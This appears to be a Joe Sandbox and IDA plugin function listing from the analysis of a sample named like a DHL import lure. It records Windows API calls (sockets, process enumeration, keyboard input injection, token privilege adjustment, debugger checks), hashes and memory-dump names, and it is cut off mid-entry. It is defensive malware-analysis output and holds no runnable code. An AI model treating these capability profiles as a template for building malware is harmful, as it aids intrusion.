Instruction ID: bd88069801f97333dd5f8f0aca494b13c98c6fd685441c79b53cd720df9f6ae8
Opcode Fuzzy Hash: 8ba564f1eb8dd3bf7efffc86073b9226c2f38895b647101d377d484d8f925ad6
Instruction Fuzzy Hash: 03A12CB090448CBEE7749A2C9C5DF7B3F9DFB86340F14420BF612C6691CA299D06D27A

Function 00561806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0056304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0056307A
Part of subcall function 0056304E: _wcslen.LIBCMT ref: 0056309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0056185D
WSAGetLastError.WSOCK32 ref: 00561884
bind.WSOCK32(00000000,?,00000010), ref: 005618DB
WSAGetLastError.WSOCK32 ref: 005618E6
closesocket.WSOCK32(00000000), ref: 00561915

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 4ba0670a802a63fc47035c9a0671e8f77d0cf5cb4c4850b131074c3e5d580e87
Instruction ID: 4d824cff3c142dc42797aa87f15c14d1fc6dcf77f64fc6f807d7800cfcec64ac
Opcode Fuzzy Hash: 4ba0670a802a63fc47035c9a0671e8f77d0cf5cb4c4850b131074c3e5d580e87
Instruction Fuzzy Hash: B651C571A00600AFD710AF25D886F3A7BE5AB44718F08849DF9569F3C3C775AD41CBA5

Function 00571C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00571CC0
IsWindowEnabled.USER32 ref: 00571CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00571CDB
IsIconic.USER32 ref: 00571CE9
IsZoomed.USER32 ref: 00571CF7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: fd973bf353743e300a1b4fe3353b580ad53cd1af3085274f658236ad3100c683
Instruction ID: fbba7cf26b6780e99519983500560f9aa38e2abcd61ac732d3c5ed24af880aa2
Opcode Fuzzy Hash: fd973bf353743e300a1b4fe3353b580ad53cd1af3085274f658236ad3100c683
Instruction Fuzzy Hash: 2321A2317406115FD7218F5EE884B167FA9BF95315F19C05CE84E8B251CB71DC42EB98

Function 004E8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00525DF0
VUUU, xrefs: 004E83E8
VUUU, xrefs: 004E843C
VUUU, xrefs: 004E83FA
ERCP, xrefs: 004E813C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 744286619507cf683122b12ab89a72012e0baad29ddc01199568cf26d4a6531e
Instruction ID: b7fcf2e8d671c3ef32b8f7f5031def45b67e6ffda362c206c699563f39a90ec1
Opcode Fuzzy Hash: 744286619507cf683122b12ab89a72012e0baad29ddc01199568cf26d4a6531e
Instruction Fuzzy Hash: 2FA2C270E0026ACBDF24CF59D8407AEBBB1BF55311F2485AAD819A7380EB349D81CF95

Function 00548298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 005482AA

Strings

(, xrefs: 005482F0
|, xrefs: 005482DA
tbZ, xrefs: 005484F4

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: lstrlen
String ID: ($tbZ$|
API String ID: 1659193697-2836324853
Opcode ID: 7e8896f59c5157bcbfcb4ed08f2b47c0a16ea5aaa6142a97f9f236c3f1e19695
Instruction ID: a3e4bc449ca8fc9eb012fb64f2e598d6b43052dde67b228015a093be142b3f6e
Opcode Fuzzy Hash: 7e8896f59c5157bcbfcb4ed08f2b47c0a16ea5aaa6142a97f9f236c3f1e19695
Instruction Fuzzy Hash: 5B323875A007059FC728CF19C4819AABBF0FF48714B15C96EE59ADB3A1DB70E941CB44

Function 0056A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0056A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0056A6BA

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0056A79C
CloseHandle.KERNEL32(00000000), ref: 0056A7AB

Part of subcall function 004FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00523303,?), ref: 004FCE8A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e19e51f9931ccb5d2ae669a55d65b3379df527ff26d37c70899ea46851021aa2
Instruction ID: ed88e2bf76cfd69a7777b52134140a03fdd61978bd6ac0bbbe070ddfeecf1579
Opcode Fuzzy Hash: e19e51f9931ccb5d2ae669a55d65b3379df527ff26d37c70899ea46851021aa2
Instruction Fuzzy Hash: 7C5170715083409FD710EF26C885E6BBBE8FF89758F40492EF58597292EB34E904CB96

Function 0054AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0054AAAC
SetKeyboardState.USER32(00000080), ref: 0054AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0054AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0054AB88

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 47b26b3c9b95947e6de4dbe0cdbc33235aec6856376ba8c73dddc43250d81131
Instruction ID: 49595b7832fd44f7231f0909cd5f3c44f96faad9412b40876f5cc756f2ee0a82
Opcode Fuzzy Hash: 47b26b3c9b95947e6de4dbe0cdbc33235aec6856376ba8c73dddc43250d81131
Instruction Fuzzy Hash: CF315730AC0208AEFF34CB68CC09BFA7FAAFB84318F04421AF085961D0D7748985D762

Function 0051BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0051BB7F

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

GetTimeZoneInformation.KERNEL32 ref: 0051BB91
WideCharToMultiByte.KERNEL32(00000000,?,005B121C,000000FF,?,0000003F,?,?), ref: 0051BC09
WideCharToMultiByte.KERNEL32(00000000,?,005B1270,000000FF,?,0000003F,?,?,?,005B121C,000000FF,?,0000003F,?,?), ref: 0051BC36

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 09f7a5ad9c191e38022d244a81879923dbe4e2e421182964c8c78a4c944ec2dd
Instruction ID: e22571555b0d6eb7fecf1a3b0bd28aa5622867ea6f4ebedbcc9e38f816af8a8c
Opcode Fuzzy Hash: 09f7a5ad9c191e38022d244a81879923dbe4e2e421182964c8c78a4c944ec2dd
Instruction Fuzzy Hash: 6D31D470904206DFEB50DF6ADC904ADFFB8FF55310764466AE024D72A1D730AE94EB90

Function 0055CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0055CE89
GetLastError.KERNEL32(?,00000000), ref: 0055CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0055CEFE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 7f0a0523a6759f8129646b1ceee4099ce3035e9be01361f4368748d1e2abe901
Instruction ID: ed03db47651b4b265c8fdaed27d83ba6e0b65adbc4512732f7bfc34123fe1d04
Opcode Fuzzy Hash: 7f0a0523a6759f8129646b1ceee4099ce3035e9be01361f4368748d1e2abe901
Instruction Fuzzy Hash: 1521BD715003059FE721CFA5D95ABAA7FFCFF50315F10481EE946A2151E770EE489B60

Function 0054DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00525222), ref: 0054DBCE
GetFileAttributesW.KERNEL32(?), ref: 0054DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0054DBEE
FindClose.KERNEL32(00000000), ref: 0054DBFA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 478f531c05f8b25b38fd916ad252d93800e5711c236f3990143dc6cf859d3bb9
Instruction ID: 31f4ef15fcbefe44a750e7e962b8aca3b4379a55cc5f7acae440c3797ff464dd
Opcode Fuzzy Hash: 478f531c05f8b25b38fd916ad252d93800e5711c236f3990143dc6cf859d3bb9
Instruction Fuzzy Hash: 77F0A7304105105782216BB8AC4D4AA3F7CAF42338B504716F47AC10E0EBB05DD8EAA5

Function 00555C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00555CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00555D17
FindClose.KERNEL32(?), ref: 00555D5F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: c534fde48b3cef9c8d82be34b026ceba450429fc0710d5de588e75db9ed7ddc7
Instruction ID: 10b38c3c56142716d300570033baf2377a00d3caa57f886a1b21d5d31df1b551
Opcode Fuzzy Hash: c534fde48b3cef9c8d82be34b026ceba450429fc0710d5de588e75db9ed7ddc7
Instruction Fuzzy Hash: 9F519A75604A019FC714CF29C4A4A9ABBF4FF49314F14855EE99A8B3A2DB30ED48CF91

Function 00512622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0051271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00512724
UnhandledExceptionFilter.KERNEL32(?), ref: 00512731

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c7de26cf7c5c4d9d4376010d1aad6f1c84882dbfee9b04d7ac2c8970d88cbfa6
Instruction ID: 8c2fd5232062237632db200955638ab019f44c1e146ece8c5cc0a99a9cd846ab
Opcode Fuzzy Hash: c7de26cf7c5c4d9d4376010d1aad6f1c84882dbfee9b04d7ac2c8970d88cbfa6
Instruction Fuzzy Hash: 6A31C4749112199BCB21DF68DC887DDBBB8BF18310F5045EAE80CA62A1EB309F858F45

Function 005551CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005551DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00555238
SetErrorMode.KERNEL32(00000000), ref: 005552A1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: f8986c72aa1ac7222b1ad30db30e8bfb7f4fd30a1412f34d5df94b76db9364b7
Instruction ID: ff2be1e49430dd1a4b882aec808eff219f309d008c5a65b1228e500624b27aef
Opcode Fuzzy Hash: f8986c72aa1ac7222b1ad30db30e8bfb7f4fd30a1412f34d5df94b76db9364b7
Instruction Fuzzy Hash: 1B318035A00608DFDB00DF55D894EADBBB4FF48318F448099E8099B3A2DB35EC5ACB50

Function 005416C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 004FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00500668
Part of subcall function 004FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00500685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0054170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0054173A
GetLastError.KERNEL32 ref: 0054174A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 461ee0d7678816b2a0bef1f4999004e8dfe976ff7a1051a07039ebf7412cfc70
Instruction ID: d468c47ff49529f68c1c7bc3899eccd6572208aabc9a3b9334d2468b5d0dc23c
Opcode Fuzzy Hash: 461ee0d7678816b2a0bef1f4999004e8dfe976ff7a1051a07039ebf7412cfc70
Instruction Fuzzy Hash: 4711C1B2400308AFD7189F54EC86DAEBBB9FF04718B20852EE05657241EB70FC858A64

Function 0054D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0054D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0054D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0054D650

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a36244f786b6a96e36abf0c4a4cde1559d13e428bae62d177f2ebbc3116112fb
Instruction ID: f899b152fd8a7853ec6f1b43534dfabea2f4161eb6aa84c57887ffadba0ec47c
Opcode Fuzzy Hash: a36244f786b6a96e36abf0c4a4cde1559d13e428bae62d177f2ebbc3116112fb
Instruction Fuzzy Hash: E3113C75E05228BBDB108F99AC45FAFBFBCEB45B50F108165F908E7290D6704A059BA1

Function 00541663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0054168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005416A1
FreeSid.ADVAPI32(?), ref: 005416B1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 3813d5e3bca08d10b9b7ed00847bb9837c25934893e4d80bc85b3a0755e0558f
Instruction ID: 3bf32006094cb1042e886799e8a75d12b039a7c9d619a388520d2007fd2e3234
Opcode Fuzzy Hash: 3813d5e3bca08d10b9b7ed00847bb9837c25934893e4d80bc85b3a0755e0558f
Instruction Fuzzy Hash: A6F0F971950309FBDB00DFE5AD89EAEBBBCFB04604F504565E501E2181D774AA48AB54

Function 00504CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(005128E9,?,00504CBE,005128E9,005A88B8,0000000C,00504E15,005128E9,00000002,00000000,?,005128E9), ref: 00504D09
TerminateProcess.KERNEL32(00000000,?,00504CBE,005128E9,005A88B8,0000000C,00504E15,005128E9,00000002,00000000,?,005128E9), ref: 00504D10
ExitProcess.KERNEL32 ref: 00504D22

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d57c7a7b0f8741ac57bdbb5d8a7f6a4a63d19338725b4023ed56b0e45042ef70
Instruction ID: d7d6ed8576c40ded1581a5bb89f422ee93d3ebae5f501a352332f2ba9c11d404
Opcode Fuzzy Hash: d57c7a7b0f8741ac57bdbb5d8a7f6a4a63d19338725b4023ed56b0e45042ef70
Instruction Fuzzy Hash: 97E0B672000248BBDF11AF54ED0DA583F69FB91785B144418FD099A172CB35DD86EE80

Function 0053D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0053D28C

Strings

X64, xrefs: 0053D2A8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 76da24dd7aa9a44fd4464974ca441b2028c90bfaa08c8c5a8ab36ab6868dbde4
Instruction ID: a1a229bf8a9dc208b896f5f5d377705d7c57963c68cbcdf586a8af7d1ec76b0e
Opcode Fuzzy Hash: 76da24dd7aa9a44fd4464974ca441b2028c90bfaa08c8c5a8ab36ab6868dbde4
Instruction Fuzzy Hash: 57D0C9B480111DEECF90CB90EC8CDDEB77CBB14305F100556F506A2000DB3495499F20

Function 0050CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
